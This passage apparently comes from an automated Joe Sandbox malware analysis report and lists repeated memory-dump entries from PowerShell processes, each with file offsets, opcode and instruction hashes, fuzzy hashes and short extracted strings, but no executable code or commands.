                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 28a7b2b1b1c0d27c99a59fd32839f9d26eec768bc5092b2f1c2240f0fb25d633
                                            • Instruction ID: 44e2c451da39c7dcd0e183895e805efb265a1dd61bef54b4d8c6c185bb62f098
                                            • Opcode Fuzzy Hash: 28a7b2b1b1c0d27c99a59fd32839f9d26eec768bc5092b2f1c2240f0fb25d633
                                            • Instruction Fuzzy Hash: 4E315952D5FA8F8FFBA59B6858161786AC4EF02251B9941BEF44EC70D3DD0BAC0883C1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9666d93c62f6484476459f913457c05bfd61d0946cb73fbd30150aaef98a2502
                                            • Instruction ID: 7913a1681dc34ba953844fab140035fae74d7bef1ad87b099c987446873d185e
                                            • Opcode Fuzzy Hash: 9666d93c62f6484476459f913457c05bfd61d0946cb73fbd30150aaef98a2502
                                            • Instruction Fuzzy Hash: 4E21E726B8DB0E8DF669922CF8021F977C4DBC6131F14527AE44FC3592DE16E84A82C1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0de28f53119bedf43cecf853411e1ec997dc51fca56fa753132262c6ab872200
                                            • Instruction ID: 14a2dc671afab39205c747898d30d7ce4c43f6af4fda76d475b37ea052616750
                                            • Opcode Fuzzy Hash: 0de28f53119bedf43cecf853411e1ec997dc51fca56fa753132262c6ab872200
                                            • Instruction Fuzzy Hash: 9D213962ADEB4F8FF395972C484517466C5EF42251B5984BDF04EC31E3EE1AEC498381
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1397601725.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac480000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7a4069144697109f53dc621280cbf7151462d988a6443562c2c3015e7e498691
                                            • Instruction ID: 2a6a9f09151bb72221d6f97c024c375cc5170b59527338e32234f2019913f9be
                                            • Opcode Fuzzy Hash: 7a4069144697109f53dc621280cbf7151462d988a6443562c2c3015e7e498691
                                            • Instruction Fuzzy Hash: FC310F3081964ECFFBB49F14CC4ABF932A4FF47319F404139D42D86192DA79AA49CB99
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1397601725.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac480000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                            • Instruction ID: 2656575291c8875a46413937028047aeba70f00380b257143915173ce57c4091
                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                            • Instruction Fuzzy Hash: 5101677111CB0C8FD744EF0CE451AB5B7E0FB95364F10056DE58AC3661D636E881CB45
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$x.xk$-xk
                                            • API String ID: 0-634362551
                                            • Opcode ID: 2750a42b88f09a902db26100b5741e1076d1a993695174c4f1a5d9efee2fe943
                                            • Instruction ID: adec2051ffeb3c77ee4cdfe1b83c2c507ce1df7898f4e209e156175bd530dbce
                                            • Opcode Fuzzy Hash: 2750a42b88f09a902db26100b5741e1076d1a993695174c4f1a5d9efee2fe943
                                            • Instruction Fuzzy Hash: BA427FB0A00215DFDB64DF54C990B9EBBB2BB85300F5485AAD909AF355CB31ED41CFA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$x.xk$-xk
                                            • API String ID: 0-634362551
                                            • Opcode ID: 8a635fede05468d9ac8ba85c548a1fccd0705abc663bbe1934d037771623485f
                                            • Instruction ID: da85be6a39b8d6387f72fe9b82a8e97dbc994bd557c8cd9d6c583d1f5b1918c0
                                            • Opcode Fuzzy Hash: 8a635fede05468d9ac8ba85c548a1fccd0705abc663bbe1934d037771623485f
                                            • Instruction Fuzzy Hash: CFD1B1B4A002059FD728DFA4C554B9EBBB2FF88710F25C469DA016F395CB31EC468BA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$x.xk$x.xk$-xk
                                            • API String ID: 0-1322044245
                                            • Opcode ID: 9f060494091edbf660335c4053781a4c2c0fc27e97d5bbdcba17b9d15e0c2025
                                            • Instruction ID: dfbe5a42a87bb25a07b0c9da2e8c3f154a1b2497f7cfb79b32f44bdc5be6c867
                                            • Opcode Fuzzy Hash: 9f060494091edbf660335c4053781a4c2c0fc27e97d5bbdcba17b9d15e0c2025
                                            • Instruction Fuzzy Hash: 5EF191B4A002149FDB74DF64C950B9EBBB2BB84300F5484A9D6096F791CB71ED42DFA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$x.xk$-xk
                                            • API String ID: 0-1390172571
                                            • Opcode ID: 2ce520ccf8a138edd438cf08196edfbfd68108621942ede454a8c5aa15bea588
                                            • Instruction ID: 323ef3fd0abffbd9eee390b6e0eb2a15507863aa3d0ae652c1ccbc5caf83d4e4
                                            • Opcode Fuzzy Hash: 2ce520ccf8a138edd438cf08196edfbfd68108621942ede454a8c5aa15bea588
                                            • Instruction Fuzzy Hash: 4FB1ABB4A002049FDB24DF54C690B9EBBB2EF88714F15C469EA017F395CB31E9468BA5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $q$$q$$q
                                            • API String ID: 0-3067366958
                                            • Opcode ID: f80c8f60a175062e7c40ce595b6c0ee900b1c6c6060dc8a33bb520c99066b931
                                            • Instruction ID: 6e2ad56ad05330285102260de201a0c26481e76ea674430633f5dc19c2ff124b
                                            • Opcode Fuzzy Hash: f80c8f60a175062e7c40ce595b6c0ee900b1c6c6060dc8a33bb520c99066b931
                                            • Instruction Fuzzy Hash: A1418DF1B006158FCF649A6999402AEF7E1AFC4A11B14842ADE09DB342DA31DA41C7E8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q
                                            • API String ID: 0-1467158625
                                            • Opcode ID: 6b791e6803487e4178dceabbf09065e161454c69466234c2d2600a1a48a697f7
                                            • Instruction ID: 98d3af9ad86d5122c449e8407024db54129a521927461f2031f774d48edc6f2f
                                            • Opcode Fuzzy Hash: 6b791e6803487e4178dceabbf09065e161454c69466234c2d2600a1a48a697f7
                                            • Instruction Fuzzy Hash: B4628BB4B00204DFDB68CB98C590B5EBBB2AF85314F15C469EA05AF351DB32ED42CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $q$$q
                                            • API String ID: 0-3126353813
                                            • Opcode ID: 84790a911871fdaef9e276097c01faa964ff535184a9f89de238fa1d4a564b6c
                                            • Instruction ID: da2b237fdd6a8891dac73d34c542dda372fa423a483794c3f1041c0b024782b4
                                            • Opcode Fuzzy Hash: 84790a911871fdaef9e276097c01faa964ff535184a9f89de238fa1d4a564b6c
                                            • Instruction Fuzzy Hash: EA11DAF6E00A1ADB8F649F5995401B9B7F4FF48A10B194126DE18E7202D770DA80C7AD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q
                                            • API String ID: 0-1807707664
                                            • Opcode ID: 72f1f91783566579261be4da1320e314c799aaeea162b288870c08a4bff3cf14
                                            • Instruction ID: 237bfd39b91a3df20a5777d1c34f55a93dfc5cecb0f78fbf2d50116cf4efac8f
                                            • Opcode Fuzzy Hash: 72f1f91783566579261be4da1320e314c799aaeea162b288870c08a4bff3cf14
                                            • Instruction Fuzzy Hash: 37527AB4A00245DFDB58CF44C590B9EBBB2BF85314F15C469EA05AB351CB72EE82CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: x.xk
                                            • API String ID: 0-2157606827
                                            • Opcode ID: 5e574562a0bd3f63e033916694c456f42b12ac0c7bdd6ef90192a4cde8f5cd6a
                                            • Instruction ID: 6e2121054ded7fd9ea7ec84ca84478c276f220f2c04f2c324c447bfb44c328dd
                                            • Opcode Fuzzy Hash: 5e574562a0bd3f63e033916694c456f42b12ac0c7bdd6ef90192a4cde8f5cd6a
                                            • Instruction Fuzzy Hash: 47B1A3B0B10204DFD768DB55DA54B9EBBE3AF89301F54C469DA02AF781CB31EC418BA5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: x.xk
                                            • API String ID: 0-2157606827
                                            • Opcode ID: 36f02435c2d682fd2c5d711627f13e3626a7c08be459b6599f534a9c3bef0bb3
                                            • Instruction ID: e2e13eb3e2d75620d3f484bc9b8719a6b00416335cdc01313f4aa9cf26e1f0e4
                                            • Opcode Fuzzy Hash: 36f02435c2d682fd2c5d711627f13e3626a7c08be459b6599f534a9c3bef0bb3
                                            • Instruction Fuzzy Hash: C3A1AFB0A00200AFD768DF54DA94B9EBBF2AF89310F54C469E6016F791CB31EC41CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: h2zk
                                            • API String ID: 0-4152957090
                                            • Opcode ID: 7c2c56ccf3f0b6a1f602a21a826a564ca4d2f2fd0f7c28e30f334234258a9eb9
                                            • Instruction ID: b64ae7d341d2665bf9a591cee46c1cd34b8127a6a765d5442846999589ef7bc1
                                            • Opcode Fuzzy Hash: 7c2c56ccf3f0b6a1f602a21a826a564ca4d2f2fd0f7c28e30f334234258a9eb9
                                            • Instruction Fuzzy Hash: E651A2F5B10209DFEB64CE58D550B69BBA2EF85314F18C469EA059F381CB32DD41CB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd